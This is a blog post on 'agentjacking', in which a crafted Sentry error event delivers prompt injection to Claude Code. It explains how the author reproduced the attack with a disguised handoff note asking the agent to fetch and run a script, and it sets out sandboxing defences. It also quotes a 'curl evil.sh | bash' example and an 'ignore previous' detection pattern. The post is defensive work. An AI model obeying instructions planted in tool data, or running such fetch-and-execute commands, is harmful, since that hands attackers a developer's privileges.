Agentjacking via Sentry: How I Sandbox Claude Code

A controlled disclosure from Tenet Security in June showed something I had been quietly worried about for months: a single crafted Sentry error event hijacked Claude Code and got it to execute attacker-supplied instructions with the developer's full local privileges. No breach. No stolen token. No CVE in Sentry itself. The attacker used a public DSN, the same kind that ships in every frontend bundle on the internet.
I have wired Claude Code, Cursor agents, and custom LangGraph workers into Sentry, Jira, PagerDuty, and Datadog pipelines for client engagements. After reading the Tenet writeup and reproducing the core idea in a sandbox, I rebuilt how I let agents touch observability data. Here is what actually changed, why EDR and WAF are useless against this class of attack, and the specific guardrails I now ship by default.
What "agentjacking" actually is, in plain terms
Agentjacking is prompt injection delivered through a trusted business tool. The agent reads an error report, a ticket, a PagerDuty incident, or a log line, treats the contents as instructions instead of data, and acts on them with whatever tools and credentials it currently holds. In the Tenet Sentry case, the payload was a normal-looking error event posted to a public DSN. When the developer asked Claude Code to triage recent Sentry errors, the agent ingested the event, parsed the embedded instructions, and ran the attacker's shell commands locally.
The reason every traditional control missed it:
- EDR saw a developer's own terminal running
npm,git, andcurl. Nothing anomalous. - WAF saw normal HTTPS traffic to api.sentry.io. The malicious payload went in through a legitimate, public ingest endpoint.
- IAM saw the developer's own session token being used. The agent inherited it.
- Firewall egress saw outbound calls to GitHub and an S3 bucket. Both are on every allowlist on earth.
The attack surface is not the network. It is the agent's trust boundary between "data I am analyzing" and "instructions I should follow." Sentry, Jira, Datadog, and PagerDuty all have the same exposure because they all accept untrusted user-controlled content (error messages, ticket descriptions, incident summaries, log lines) and present it to agents as authoritative context.
Why Sentry, Datadog, PagerDuty, and Jira are structurally identical here
All four systems share three properties that make them perfect injection carriers:
- Public or semi-public ingest. Sentry DSNs ship in client bundles. PagerDuty integration keys leak in GitHub repos weekly. Datadog accepts logs from anywhere you forward them. Jira often has public-facing intake (Service Desk portals, email-to-ticket).
- High agent trust. Engineers wire these tools into agents precisely because they are the source of truth for what is broken. The agent is expected to act on the contents.
- Rich free-text fields. Error messages, stack traces, ticket bodies, runbook URLs, custom tags. All attacker-controllable. All passed to the model verbatim in most integrations.
Here is the rough mapping of injection vectors I have personally confirmed are reachable:
| Tool | Untrusted field | Who can write it |
|---|---|---|
| Sentry | event message, breadcrumbs, tags, extras | Anyone with the public DSN |
| PagerDuty | incident title, custom details, dedup key | Anyone with the integration key |
| Datadog | log message, tags, span attributes | Anyone forwarding logs |
| Jira | summary, description, comments, attachments | Anyone with portal access or your support email |
If your agent reads from any of these and has tool access to a shell, the file system, the package manager, or your cloud credentials, you have the same exposure Tenet demonstrated.
How I reproduced the core attack in a sandbox
I will not publish a working payload, but the shape is straightforward and useful for engineers who want to test their own setup.
I spun up a throwaway Sentry project, grabbed the public DSN, and posted a single event with a long stack trace. Inside the extra field I placed a block of text that looked like a "debugging note from the on-call engineer" asking the agent to fetch and execute a helper script from a URL I controlled. The helper just wrote a file to /tmp to prove execution.
I then asked Claude Code, in a fresh session with the Sentry MCP server connected, to "look at the latest unresolved error and suggest a fix." The agent retrieved the event, read the fake note, and (depending on the model and the exact wording) either ran the fetch directly or proposed it as the next step in a way that a tired engineer would approve without reading.
Two findings worth sharing:
- The attack does not need to win every time. Even a 5% success rate against an agent that runs on every error is enough.
- The payload does not need to look like a prompt injection. The most effective version I tried was written as a polite handoff note from a fictional senior engineer, including a plausible internal URL.
The sandbox model I now use for agent tool calls
The fix is not "tell the model to ignore instructions in data." That guidance is theater. The fix is to assume every byte coming from Sentry, Jira, PagerDuty, and Datadog is hostile, and to put real engineering between the agent and anything that can hurt you.
Here is the architecture I default to now for any client agent that touches observability tools.
1. Quarantine the read path
Untrusted content never reaches the main agent directly. A small extractor model (cheap, narrow, no tools) reads the raw Sentry/Jira/Datadog payload and outputs a strict JSON schema: error type, file, line, stack frames, fingerprint, severity. Free text is dropped or truncated to a hard limit (I use 2 KB) and tagged as untrusted_string.
class TriagedError(BaseModel):
fingerprint: str
error_type: str
file_path: str # validated against repo paths
line: int
severity: Literal["error", "warning", "info"]
message_excerpt: str = Field(max_length=2000)
# nothing else passes through
The main agent only ever sees this struct. URLs, instructions, code blocks, and HTML in the original event are stripped before it gets anywhere near a tool-calling loop.
2. Split the agent into two roles with different permissions
I run two agents:
- Triage agent: reads the quarantined struct, has read-only tools (search repo, view file, query metrics). No shell, no network, no write access.
- Action agent: takes a structured proposal from the triage agent and, only after human approval, executes a narrow set of allowlisted commands.
The triage agent cannot escalate. The action agent cannot read raw observability data. This breaks the kill chain even when injection succeeds, because the compromised agent simply does not hold the dangerous tools.
3. Run tool execution inside a real sandbox, not a "be careful" prompt
For any agent that needs to run code (Claude Code style), I run it inside a container with:
- Read-only mount of the repo, except a single
/workspace/scratchwritable directory. - Egress allowlist enforced at the network namespace, not at the application layer. Default deny. GitHub, npm registry, the specific Sentry/Jira API endpoints. Nothing else.
- No host credentials mounted. AWS, GCP, and registry tokens live outside the container and are exchanged for short-lived, scoped tokens via a broker the agent has to explicitly request through a tool call that requires human approval.
seccompprofile that blocksptrace, raw sockets, and module loading.
This is roughly 40 lines of Docker plus a small Python broker. It is the single highest-leverage control I ship.
4. Treat every tool call as a typed contract, not a string
Most agent frameworks let the model emit arbitrary shell strings. Do not do this. Every tool the agent can call should take typed arguments and validate them before execution.
@tool
def run_test(test_path: str) -> TestResult:
if not test_path.startswith("tests/"):
raise ToolError("test_path must be under tests/")
if not Path(test_path).exists():
raise ToolError("test_path does not exist")
return subprocess.run(
["pytest", test_path, "-x", "--timeout=30"],
capture_output=True, timeout=60, check=False,
)
The model cannot ask for ; curl evil.sh | bash because there is no string concatenation anywhere in the path. The tool only knows how to run pytest on files under tests/.
5. Add a separate "instruction detector" on the read path
I run a cheap classifier (a small local model via Ollama works fine for this) over every untrusted text field before it reaches even the triage agent. It scores the text for instruction-like patterns: imperative verbs, URLs paired with execution verbs, role-play framing, "ignore previous", and the specific patterns Tenet documented. Anything above a threshold gets quarantined and surfaced to a human, not the agent.
This is not a silver bullet. It catches roughly 80-90% of the obvious payloads in my test corpus and gives me an audit trail. The sandbox catches the rest.
6. Log every tool call with the originating data source
The single most useful debugging and forensic tool I added: every tool invocation logs the upstream source of the context that triggered it. If run_test was called and the triage agent's context included Sentry event abc123, that link is recorded. When something goes wrong, I can answer "which external event caused this action" in one query. Without this, post-incident analysis on agent systems is basically impossible.
The numbers that convinced me to ship this
On a real client agent that processes around 400 Sentry events a day, the full sandbox stack adds:
- About 180 ms of latency per event (extractor model plus classifier).
- Roughly $0.002 per event in extra inference cost. Call it $25 a month at this volume.
- One additional container per developer workstation for Claude Code style local agents.
In exchange, I have a system where a successful prompt injection in a Sentry event results in, at worst, a triage agent producing a wrong suggestion that a human declines. No code execution. No credential exposure. No outbound traffic to anywhere not on the allowlist.
That trade is not close. $25 a month and 180 ms is nothing against the cost of one compromised developer laptop with cloud credentials on it.
What I'd do this week if you have agents wired into observability
If you have Claude Code, Cursor, or a custom agent with Sentry, Jira, PagerDuty, or Datadog access today, here is the order I would attack this in:
- Audit which agents read from public ingest paths. Any DSN in a frontend bundle, any PagerDuty integration key in a public repo, any Service Desk portal. That is your blast radius.
- Strip free-text fields at the integration layer, not in the prompt. Even a naive regex pass that drops URLs and code blocks from Sentry messages before they hit the model removes most opportunistic payloads.
- Split read and write agents. This is a one-day refactor for most setups and it removes the entire class of "injection escalates to execution."
- Containerize the agent's execution environment with egress allowlists and no host credentials. If you cannot do this for local Claude Code today, at least run it in a VM with a separate user account and no SSO session.
- Add source-of-context logging to every tool call. You will need this the first time something weird happens.
- Assume the model is not your security boundary. It never was. The boundary is what tools it can call and what those tools will accept.
The uncomfortable truth is that agent security in 2026 looks a lot like web security in 2005. We are rediscovering that untrusted input plus privileged execution equals a bad day, and we are doing it tool by tool. Sentry happens to be the first one with a public writeup. Datadog, Jira, and PagerDuty have the same shape. So does GitHub Issues. So does your support inbox.
If you are wiring agents into production systems and want a second pair of eyes on the trust boundaries, or you want help building the sandbox layer once instead of three times, get in touch at lazar-milicevic.com/#contact. There is more on agent architecture and production LLM work on the rest of the blog if you want to keep reading.
Frequently asked questions
What is agentjacking and how does it work through tools like Sentry?
Agentjacking is prompt injection delivered through a trusted business tool like Sentry, Jira, PagerDuty, or Datadog. The AI agent reads an error report, ticket, or log line and treats the attacker-controlled contents as instructions rather than data, executing them with whatever local privileges and tools the developer's session holds. In the Sentry case disclosed by Tenet Security, a crafted error event posted to a public DSN caused Claude Code to run attacker-supplied shell commands when an engineer asked it to triage recent errors. No credentials were stolen and no vulnerability existed in Sentry itself, only the agent's failure to distinguish data from instructions.
Why don't EDR, WAF, and firewalls stop agentjacking attacks?
Traditional security controls miss agentjacking because nothing on the network or endpoint looks anomalous. EDR sees the developer's own terminal running normal tools like npm, git, and curl; the WAF sees legitimate HTTPS traffic to api.sentry.io; IAM sees the developer's own valid session token; and egress firewalls see outbound calls to GitHub or S3 that are on every allowlist. The attack surface is not the network at all, it is the agent's trust boundary between data it is analyzing and instructions it should follow. Controls designed for network and process anomalies cannot see a semantic confusion happening inside the model's context window.
Which observability and ticketing tools are vulnerable to prompt injection via agents?
Sentry, PagerDuty, Datadog, and Jira are all structurally vulnerable because they share three properties: public or semi-public ingest endpoints, high agent trust as sources of truth for incidents, and rich free-text fields passed verbatim to models. Sentry event messages and breadcrumbs are writable by anyone with the public DSN, PagerDuty incident titles by anyone with the integration key, Datadog log messages by anyone forwarding logs, and Jira summaries and comments by anyone with portal or support-email access. Any agent that reads from these tools and also has shell, filesystem, package manager, or cloud credential access inherits the same exposure demonstrated against Claude Code via Sentry.
How can I sandbox Claude Code or other AI agents that read from Sentry and Jira?
I treat every byte from observability and ticketing tools as hostile and put real engineering between the agent and anything dangerous. The core pattern is to quarantine the read path: a small, cheap extractor model with no tools parses the raw payload into a strict JSON schema containing only validated fields like fingerprint, error type, file path, and stack frames. Free-text fields are truncated to a hard limit (I use 2 KB) and explicitly tagged as untrusted_string before reaching the main agent. Telling the model to ignore instructions in data is theater; schema-based extraction and tool isolation are what actually work.
Does telling the AI model to ignore instructions in error data prevent prompt injection?
No, instructing the model to ignore injected instructions is security theater and should not be relied on. The most effective payloads I tested did not look like prompt injection at all; the best version was written as a polite handoff note from a fictional senior engineer with a plausible internal URL, which a tired on-call engineer would approve without reading carefully. Even a 5% success rate is catastrophic when an agent runs on every incoming error. The only reliable defense is architectural: extract structured fields with a narrow tool-less model, drop or quarantine free text, and never let untrusted strings reach an agent that holds shell or credential access.
Building something hard with AI or automation? I am open to talk.
Get in touch